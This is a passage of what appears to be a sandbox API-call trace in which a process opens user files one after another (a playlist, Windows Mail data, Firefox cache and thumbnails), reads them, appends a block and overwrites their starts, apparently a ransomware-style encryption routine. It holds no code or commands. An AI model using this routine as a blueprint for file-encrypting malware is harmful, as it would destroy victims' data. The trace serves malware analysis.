WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="10_All_Music.wpl", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0153.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="10_All_Music.wpl", cchWideChar=16, lpMultiByteStr=0x1f88d34, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="10_All_Music.wpl", lpUsedDefaultChar=0x0) returned 16 [0153.501] ReadFile (in: hFile=0x1d4, lpBuffer=0x269c668, nNumberOfBytesToRead=0x427, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2b1f2bc*=0x427, lpOverlapped=0x0) returned 1 [0153.503] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0153.503] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9af, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x9af, lpOverlapped=0x0) returned 1 [0153.503] CloseHandle (hObject=0x1d4) returned 1 [0153.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0153.505] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.505] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1f400 [0153.505] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0153.505] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0153.505] ReleaseMutex (hMutex=0x168) returned 1 [0153.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="thumbs.dat", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0153.505] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="thumbs.dat", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thumbs.dat", lpUsedDefaultChar=0x0) returned 10 [0153.505] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0154.844] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1e400 [0154.844] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0154.885] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1e400 [0154.886] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0154.886] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0154.886] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0154.886] CloseHandle (hObject=0x1d4) returned 1 [0154.887] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0154.910] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0154.910] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x200000 [0154.910] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0154.910] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.910] ReleaseMutex (hMutex=0x168) returned 1 [0154.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edbres00002.jrs", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0154.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="edbres00002.jrs", cchWideChar=15, lpMultiByteStr=0x1f7346c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edbres00002.jrs", lpUsedDefaultChar=0x0) returned 15 [0154.910] ReadFile (in: hFile=0x204, lpBuffer=0x28de2a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x28de2a8*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0155.019] ReadFile (in: hFile=0x204, lpBuffer=0x28de2a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x28de2a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.091] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1ff000 [0155.092] ReadFile (in: hFile=0x204, lpBuffer=0x25a8ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a8ba8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.110] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1ff000 [0155.110] WriteFile (in: hFile=0x204, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.114] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0155.114] WriteFile (in: hFile=0x204, lpBuffer=0x28e62d8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28e62d8*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0155.115] WriteFile (in: hFile=0x204, lpBuffer=0x28e62d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28e62d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0155.115] CloseHandle (hObject=0x204) returned 1 [0155.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0155.116] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.116] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe9 [0155.117] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.117] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.117] ReleaseMutex (hMutex=0x168) returned 1 [0155.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0155.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Roses.htm", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Roses.htm", lpUsedDefaultChar=0x0) returned 9 [0155.117] ReadFile (in: hFile=0x204, lpBuffer=0x2697408, nNumberOfBytesToRead=0xe9, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2697408*, lpNumberOfBytesRead=0x2b1f2bc*=0xe9, lpOverlapped=0x0) returned 1 [0155.118] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0155.118] WriteFile (in: hFile=0x204, lpBuffer=0x28790d8*, nNumberOfBytesToWrite=0x671, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28790d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x671, lpOverlapped=0x0) returned 1 [0155.118] CloseHandle (hObject=0x204) returned 1 [0155.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\0B\\FCBF5d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\0b\\fcbf5d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.139] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.139] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x204fd [0155.139] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.139] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.140] ReleaseMutex (hMutex=0x168) returned 1 [0155.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FCBF5d01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0155.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FCBF5d01", cchWideChar=8, lpMultiByteStr=0x1f735ac, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FCBF5d01", lpUsedDefaultChar=0x0) returned 8 [0155.140] ReadFile (in: hFile=0x1d4, lpBuffer=0x28790b8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0155.162] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1f4fd [0155.162] ReadFile (in: hFile=0x1d4, lpBuffer=0x2889118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2889118*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.228] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1f4fd [0155.228] WriteFile (in: hFile=0x1d4, lpBuffer=0x288b178*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288b178*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.229] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0155.229] WriteFile (in: hFile=0x1d4, lpBuffer=0x28810e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28810e8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0155.229] CloseHandle (hObject=0x1d4) returned 1 [0155.230] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.231] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.231] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x21839 [0155.231] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.231] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.231] ReleaseMutex (hMutex=0x168) returned 1 [0155.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9DCB7d01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0155.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9DCB7d01", cchWideChar=8, lpMultiByteStr=0x1f7344c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9DCB7d01", lpUsedDefaultChar=0x0) returned 8 [0155.232] ReadFile (in: hFile=0x1d4, lpBuffer=0x28790b8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0155.251] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x20839 [0155.252] ReadFile (in: hFile=0x1d4, lpBuffer=0x2891978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2891978*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.275] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x20839 [0155.276] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.276] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0155.276] WriteFile (in: hFile=0x1d4, lpBuffer=0x28810e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28810e8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0155.277] CloseHandle (hObject=0x1d4) returned 1 [0155.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.285] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.285] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2114 [0155.285] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.285] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.285] ReleaseMutex (hMutex=0x168) returned 1 [0155.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_CACHE_MAP_", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0155.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="_CACHE_MAP_", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_CACHE_MAP_", lpUsedDefaultChar=0x0) returned 11 [0155.286] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.310] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1114 [0155.310] ReadFile (in: hFile=0x1d4, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.333] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1114 [0155.333] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.333] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0155.333] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0155.334] CloseHandle (hObject=0x1d4) returned 1 [0155.334] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.337] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.337] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x40b0 [0155.337] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.337] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.337] ReleaseMutex (hMutex=0x168) returned 1 [0155.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4cc87c1409819bf06f42b782d4902b2f.png", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0155.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4cc87c1409819bf06f42b782d4902b2f.png", cchWideChar=36, lpMultiByteStr=0x1fa55f4, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4cc87c1409819bf06f42b782d4902b2f.png", lpUsedDefaultChar=0x0) returned 36 [0155.337] ReadFile (in: hFile=0x1d4, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.339] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x30b0 [0155.339] ReadFile (in: hFile=0x1d4, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.340] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x30b0 [0155.340] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.341] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0155.341] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0155.341] CloseHandle (hObject=0x1d4) returned 1 [0155.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.343] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, 